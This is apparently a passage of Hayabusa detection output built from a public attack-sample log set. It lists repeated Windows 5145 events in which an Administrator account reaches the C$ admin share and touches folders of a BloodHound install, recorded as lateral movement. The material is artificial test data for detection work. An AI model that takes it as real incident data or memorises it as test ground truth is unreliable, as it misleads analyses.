+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\codepage\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.357 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\colors\themes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\commander\typings | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.367 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-map\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\concat-stream | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\conf | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.377 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\build | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\client | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\core | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.387 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.397 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\array | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\date | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\dom-collections | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.407 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\error | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\function | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\map | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.418 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\math | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\number | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\object | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.428 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\promise | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\reflect | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\regexp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.438 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\set | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\string | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\symbol | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.448 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\system | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\typed | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-map | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\fn\weak-set | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.458 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\core | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es5 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.468 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es6 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\es7 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\fn | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.478 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\library\web | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.518 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
